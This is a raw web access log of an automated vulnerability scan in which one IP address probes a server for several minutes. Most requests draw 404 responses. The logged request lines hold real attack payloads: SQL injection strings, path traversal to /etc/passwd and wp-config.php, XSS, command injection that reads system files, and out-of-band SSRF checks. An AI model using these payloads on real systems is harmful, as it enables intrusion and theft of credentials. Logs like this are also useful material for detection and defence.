205.185.122.202 - - [19/Oct/2025:21:10:59 +0530] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5(2003152241)),0) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:11:02 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:21:11:03 +0530] "GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:11:03 +0530] "GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../Windows/win.ini HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:11:07 +0530] "GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(23448235),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:11:08 +0530] "GET /api/logout?redirect_to=xyz%0d%0axyz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:11:12 +0530] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:21:11:12 +0530] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+md5('xiqqb'),NULL,NULL+--+ HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:11:15 +0530] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,43321*41205,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:11:16 +0530] "POST /action.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:11:21 +0530] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:11:22 +0530] "GET /api/snapshots/:key HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:11:24 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:11:24 +0530] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:11:27 +0530] "POST /search.php?searchtype=5 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:11:28 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:11:30 +0530] "GET /user/City_ajax.aspx HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:11:31 +0530] "GET /apisix/admin/migrate/export HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:11:34 +0530] "GET /index.php?mod=system&op=orgtree&zero=abc%25253Cscript%25253Ealert%252528147669%252529%25253C%25252Fscript%25253E HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:11:35 +0530] "GET /resin-doc/;/WEB-INF/resin-web.xml HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:11:36 +0530] "POST /user/login/checkPermit HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:11:37 +0530] "GET /wan.htm HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:11:39 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:11:40 +0530] "GET /index.php/Home/uploadify/fileList?type=.+&path=../ HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:11:42 +0530] "GET /index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5(206131138)%27 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:11:42 +0530] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:11:44 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:11:45 +0530] "POST /signin HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:11:48 +0530] "GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:11:49 +0530] "GET /pma/ HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:21:11:51 +0530] "GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:11:52 +0530] "GET /Data/Log/19_01_01.log HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:11:53 +0530] "GET /Data/Log/20_01_01.log HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:11:53 +0530] "GET /Data/Log/21_01_01.log HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:11:53 +0530] "GET /Data/Log/22_01_01.log HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:11:55 +0530] "GET /batch.common.php?action=modelquote&cid=1&name=members+where+1=1+and+(select+1+from+(select+count(*),concat((select+md5(1718)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:11:56 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:11:58 +0530] "GET /getCorsFile?urlPath=file:///etc/passwd HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:11:59 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:21:12:05 +0530] "GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:12:06 +0530] "GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(33911314),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)' HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:12:10 +0530] "GET /config/getuser?index=0 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:12:11 +0530] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:21:12:14 +0530] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=update1&local-download=/etc/passwd HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:12:15 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:12:15 +0530] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,42591*42101,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:12:19 +0530] "GET /api/experimental/latest_runs HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:12:20 +0530] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:12:23 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:12:25 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:12:28 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 1274
205.185.122.202 - - [19/Oct/2025:21:12:29 +0530] "POST /search.php?searchtype=5 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:12:32 +0530] "POST /minio/webrpc HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:12:32 +0530] "POST /minio/webrpc HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:12:33 +0530] "GET /user/City_ajax.aspx HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:12:36 +0530] "GET /module/api.php?mobile/webNasIPS HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:12:36 +0530] "GET /index.php?mod=system&op=orgtree&zero=abc%25253Cscript%25253Ealert%252528105068%252529%25253C%25252Fscript%25253E HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:12:40 +0530] "GET /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:12:40 +0530] "POST /user/login/checkPermit HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:12:42 +0530] "GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:12:42 +0530] "GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../etc/passwd&file_name=passwd HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:12:42 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:12:44 +0530] "GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:12:45 +0530] "GET /index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5(205657708)%27 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:12:47 +0530] "POST /auth/newpassword HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:12:48 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:12:51 +0530] "GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:21:12:52 +0530] "GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:12:54 +0530] "GET /fs/console?username=16 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:12:55 +0530] "GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:12:58 +0530] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a HTTP/1.1" 404 1186
205.185.122.202 - - [19/Oct/2025:21:12:59 +0530] "GET /batch.common.php?action=modelquote&cid=1&name=members+where+1=1+and+(select+1+from+(select+count(*),concat((select+md5(1480)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:13:02 +0530] "GET /loginsave.php?u=http://interact.sh HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:13:03 +0530] "GET /getCorsFile?urlPath=file:///etc/passwd HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:13:06 +0530] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:13:07 +0530] "GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:13:11 +0530] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:13:12 +0530] "GET /config/getuser?index=0 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:13:16 +0530] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:13:17 +0530] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=update1&local-download=/etc/passwd HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:13:18 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:13:20 +0530] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:13:21 +0530] "GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:13:22 +0530] "GET /api/experimental/latest_runs HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:13:24 +0530] "POST /_async/AsyncResponseService HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:13:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:13:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:13:28 +0530] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 1274
205.185.122.202 - - [19/Oct/2025:21:13:30 +0530] "GET /objects/getSpiritsFromVideo.php?base64Url=YGVjaG8gZ251a3d0YWkgPiBmY3NsLnR4dGA%3D&format=jpg HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:13:30 +0530] "POST /minio/webrpc HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:13:31 +0530] "POST /minio/webrpc HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:13:33 +0530] "GET /api/v1/cluster/summary HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:13:34 +0530] "GET /module/api.php?mobile/webNasIPS HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:13:37 +0530] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:13:38 +0530] "GET /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:13:41 +0530] "GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:13:41 +0530] "GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:13:42 +0530] "GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../etc/passwd&file_name=passwd HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:13:45 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:13:46 +0530] "GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:13:49 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:13:51 +0530] "POST /auth/newpassword HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:13:53 +0530] "GET /UserSelect/ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:13:54 +0530] "GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:21:13:58 +0530] "GET /interface/DownFileAttach.jsp?filepath=/WEB-INF/classes/YxrConnectText.txt HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:13:59 +0530] "GET /fs/console?username=47 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:14:03 +0530] "GET /ws/v1/cluster/info HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:14:04 +0530] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a HTTP/1.1" 404 1186
205.185.122.202 - - [19/Oct/2025:21:14:07 +0530] "GET /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2093955234))%23 HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:14:08 +0530] "GET /loginsave.php?u=http://interact.sh HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:14:10 +0530] "POST /index.php?action=login.index&host=0 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:14:13 +0530] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:14:15 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:14:17 +0530] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:14:20 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:14:21 +0530] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:14:24 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:14:25 +0530] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:14:25 +0530] "GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:14:28 +0530] "POST /test/test HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:14:29 +0530] "POST /_async/AsyncResponseService HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:14:33 +0530] "GET /fetchBody?id=1/../../../../../../../../etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:14:35 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:14:37 +0530] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:14:39 +0530] "GET /objects/getSpiritsFromVideo.php?base64Url=YGVjaG8gZWFzZWljdncgPiBta3ZsLnR4dGA%3D&format=jpg HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:14:42 +0530] "GET /docpicker/internal_proxy/http/example.com HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:14:42 +0530] "GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:14:43 +0530] "GET /api/v1/cluster/summary HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:14:46 +0530] "GET /cgi-bin/config.exp HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:14:47 +0530] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:14:50 +0530] "GET /index.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:14:51 +0530] "GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:14:53 +0530] "GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:14:53 +0530] "POST /general/userinfo.php?UID=1 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:14:54 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:14:56 +0530] "GET /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(306))) HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:14:57 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:14:58 +0530] "GET /cgi-bin/ExportSettings.sh HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:14:59 +0530] "GET /UserSelect/ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:15:01 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:15:02 +0530] "GET /interface/DownFileAttach.jsp?filepath=/WEB-INF/classes/YxrConnectText.txt HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:15:04 +0530] "GET /files.md5 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:15:04 +0530] "GET /testrail/files.md5 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:15:05 +0530] "GET /ws/v1/cluster/info HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:15:08 +0530] "GET /t/index.php?action[]=test HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:15:09 +0530] "GET /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2021767933))%23 HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:15:16 +0530] "GET /objects/getImage.php?base64Url=YGVjaG8gY29vcW91Y2ggPiBwa2xpLnR4dGA%3D&format=png HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:15:19 +0530] "POST /index.php?action=login.index&host=0 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:15:22 +0530] "POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:21:15:23 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:15:27 +0530] "POST /ddi/server/fileupload.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:15:27 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:15:29 +0530] "POST /(download)/tmp/rrimzibn.txt HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:15:31 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:15:34 +0530] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:15:34 +0530] "POST /solr//config HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:15:35 +0530] "POST /test/test HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:15:37 +0530] "GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:15:38 +0530] "GET /fetchBody?id=1/../../../../../../../../etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:15:40 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:15:41 +0530] "GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:15:44 +0530] "POST /moadmin.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:15:45 +0530] "GET /docpicker/internal_proxy/http/example.com HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:15:45 +0530] "GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:15:48 +0530] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20208973416%20%2B%20207173058%20%20%3B HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:21:15:49 +0530] "GET /cgi-bin/config.exp HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:15:51 +0530] "GET /login.php?LOGIN_USER_INCLUDE=/etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:15:51 +0530] "GET /anywebmail/login.php?LOGIN_USER_INCLUDE=/etc/passwd HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:15:51 +0530] "GET /index.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:15:53 +0530] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:15:55 +0530] "GET /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:15:55 +0530] "POST /general/userinfo.php?UID=1 HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:15:58 +0530] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:16:00 +0530] "GET /login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(277))) HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:16:03 +0530] "POST /http/index.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:16:03 +0530] "POST /http/index.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:16:04 +0530] "GET /cgi-bin/ExportSettings.sh HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:16:06 +0530] "GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:16:08 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:16:11 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:16:12 +0530] "GET /files.md5 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:16:12 +0530] "GET /testrail/files.md5 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:16:15 +0530] "GET /v1/submissions HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:16:17 +0530] "GET /t/index.php?action[]=test HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:16:21 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:16:21 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:16:22 +0530] "GET /objects/getImage.php?base64Url=YGVjaG8gcnJvY2t6YnogPiBsYXZqLnR4dGA%3D&format=png HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:16:25 +0530] "GET /page/login/login.html HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:16:26 +0530] "POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:21:16:30 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:16:31 +0530] "POST /ddi/server/fileupload.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:16:34 +0530] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;cat%20/etc/passwd;%27 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:16:34 +0530] "POST /(download)/tmp/zubfqdrm.txt HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:16:37 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:16:38 +0530] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:16:38 +0530] "POST /solr//config HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:16:40 +0530] "POST /servlet/FileReceiveServlet HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:16:42 +0530] "GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:16:45 +0530] "GET /nifi-api/flow/current-user HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:16:46 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:16:49 +0530] "POST /nagiosql/admin/logbook.php HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:16:50 +0530] "POST /moadmin.php HTTP/1.1" 404 1016
